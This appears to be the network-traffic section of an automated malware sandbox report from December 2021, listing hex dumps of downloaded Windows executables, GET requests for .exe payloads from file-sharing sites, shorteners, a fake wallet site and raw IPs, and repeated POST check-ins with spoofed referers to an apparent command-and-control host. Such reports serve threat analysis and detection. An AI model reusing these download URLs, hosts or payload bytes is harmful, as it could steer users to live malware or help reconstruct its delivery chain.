00 90 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 28 21 00 00 60 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 9d 0b 00 00 10 00 00 00 9e 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 b0 0b 00 00 8c 00 00 00 a2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 75 77 75 00 00 00 05 00 00 00 00 20 14 00 00 02 00 00 00 2e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 61 78 00 00 00 00 93 0d 00 00 00 30 14 00 00 0e 00 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 b2 33 00 00 40 14 00 00 64 00 00 00 3e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 40 00 00 00 00 48 00 00 42 00 00 00 a2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:22 GMTContent-Type: application/x-msdos-programContent-Length: 347136Connection: closeLast-Modified: Fri, 31 Dec 2021 18:08:02 GMTETag: "54c00-5d4750d46820a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 23 4f a3 99 42 21 f0 99 42 21 f0 99 42 21 f0 0a 0c b9 f0 98 42 21 f0 f6 34 bf f0 88 42 21 f0 f6 34 8b f0 f6 42 21 f0 90 3a b2 f0 9a 42 21 f0 99 42 20 f0 28 42 21 f0 f6 34 8a f0 ae 42 21 f0 f6 34 bb f0 98 42 21 f0 f6 34 bc f0 98 42 21 f0 52 69 63 68 99 42 21 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 0d 07 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 12 04 00 00 d6 33 00 00 00 00 00 a0 48 02 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 38 00 00 04 00 00 f1 03 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 10 04 00 28 00 00 00 00 70 37 00 90 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 00 5c 22 00 00 30 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 10 04 00 00 10 00 00 00 12 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 0c 2a 33 00 00 30 04 00 00 8c 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 65 70 75 78 61 6d 05 00 00 00 00 60 37 00 00 02 00 00 00 a2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 90 4e 00 00 00 70 37 00 00 50 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 de 56 00 00 00 c0 37 00 00 58 00 00 00 f4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Dec 2021 18:08:25 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Fri, 31 Dec 2021 09:21:26 GMTETag: "181490-5d46db1fb73a3"Accept-Ranges: bytesContent-Length: 1578128Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 82 03 00 00 00 00 00 00 50 3f 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 40 00 00 04 00 00 63 e0 18 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 3d 00 58 01 00 00 00 50 3d 00 1c f6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 61 64 61 74 61 00 00 00 30 3d 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 61 64 61 74 61 00 00 00 10 00 00 00 40 3d 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 1c f6 01 00 00 50 3d 00 1c f6 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 78 74 00 00 00 00 80 01 00 00 50 3f 00 51 7d 01 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Dec 2021 18:08:38 GMTServer: Apache/2.4.18 (Ubuntu)Last-Modified: Fri, 31 Dec 2021 09:21:40 GMTETag: "113c98-5d46db2dac7d0"Accept-Ranges: bytesContent-Length: 1129624Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 76 c7 b4 91 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 88 06 00 00 02 02 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 18 00 00 04 00 00 43 00 12 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 96 00 02 00 00 00 00 00 00 00 00 00 00 24 11 00 98 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0c 0f 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 87 06 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 30 00 00 00 ac 0a 00 00 00 c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 76 6d 70 31 00 00 00 f0 1d 0f 00 00 e0 06 00 00 1e 0f 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 96 00 02 00 00 00 16 00 00 02 02 00 00 22 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /attachments/916319571638620172/925647741571452938/Pyroxylic.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
Source: global traffic HTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
Source: global traffic HTTP traffic detected: GET /%28/8V4TRR/q.exe%29.zip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
Source: global traffic HTTP traffic detected: GET /u8txqc HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: short.link
Source: global traffic HTTP traffic detected: GET /dogewallet-setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: dodecoin.org
Source: global traffic HTTP traffic detected: GET /file123.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: botmaybe11.mcdir.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjbkmt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcxijyjuwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqbbysmc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkinlomhlf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ojnaiutcs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdusuy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dtxmqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wtqjrw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kphmqnrmuw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhmgjqm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tglobqclp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxvhohpcp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldvwe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdcie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ngiwphgpt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krquequh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vsfpevp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dvptdfoqtt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akertbi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pllmreg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cnumrxnk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxwdukw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pykufjugo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scvcqof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://huulusns.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vgpxvtpgeu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncwfbqyeri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avmkvwudu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/2264_1640622147_2258.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tggwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsmnrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umedpd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rkepuibw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhtwlstj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://beufxufw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcjwqtsdg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yxkgtms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xktvyhvdr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phnvjykq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
